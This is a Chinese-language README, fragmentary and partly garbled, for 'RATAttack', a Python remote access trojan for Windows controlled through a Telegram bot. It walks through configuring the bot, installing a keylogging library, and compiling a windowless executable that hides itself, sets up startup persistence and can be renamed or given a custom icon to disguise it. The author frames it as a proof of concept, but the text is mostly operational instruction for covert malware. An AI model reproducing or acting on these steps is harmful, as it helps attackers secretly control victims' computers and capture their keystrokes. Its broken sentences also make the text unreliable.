
Windows Remote Post Breach Tool via Telegram
Windows 远程后渗透利用工具,通过 Telegram 控制(Python 2.7), 最初由 Ritiek 创建,经 mvrozanti 分叉并修改,随后由本人再次修改。
此工具的全部目的是演示(作为“PoC”)通过 Telegram 控制已被攻陷的机器。 与我已编写的其他工具一样,我不鼓励任何非法活动。
此修改版本使用 Telegram Bot API v2,而非传统的 v1。主要变化是使用键盘按钮代替文本输入。 我将尝试添加新功能、修复漏洞,并在完成“mvrozanti”所需的修改后兼容 API v3。 在此期间,cd、download、upload、run 和 delete 命令将无法工作。

file 形式发送给 Telegram 机器人目前市场上的远程管理工具面临两个主要问题:
本 RAT 通过使用 Telegram Bot API 克服了这两个问题。
BotFather 对话创建一个新的 Telegram 机器人。pip install -r requirements.txt。64位 或 32位 版本。
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl。pip install pyHook-1.5.1-cp27-cp27m-win32.whl。python RATAttack.py。chat_id,并在脚本中替换它,同时注释掉 return True 这一行。别担心,阅读脚本中的注释时你就会明白。
RATAttack 的文件夹,其中包含 keylogs.txt 以及你上传到机器人的任何文件。将你的路径替换到 compileAndRun.bat 中(运行该批处理会实际执行可执行文件)
运行 `pyinstaller --onefile --noconsole C:\path\to\RATAttack.py`。你也可以添加 `--icon=<path\to\icon.ico>` 来使用自定义图标。
C:\Python27\Scripts\dist\ 中找到 .exe 文件。你可以将 .exe 文件名改为任何你想要的名字。.exe,脚本会隐藏自身并感染你的 PC 以实现开机自启动。你可以通过使用 /self_destruct 选项恢复正常,或者手动删除 C:\Users\用户名\AppData\Roaming\Portal 目录和 C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk(不过目前我建议手动删除)。.exe 文件名以及隐藏 .exe 的文件夹名称和位置。为此,请修改 compiled_name 和 hide_folder。The MIT License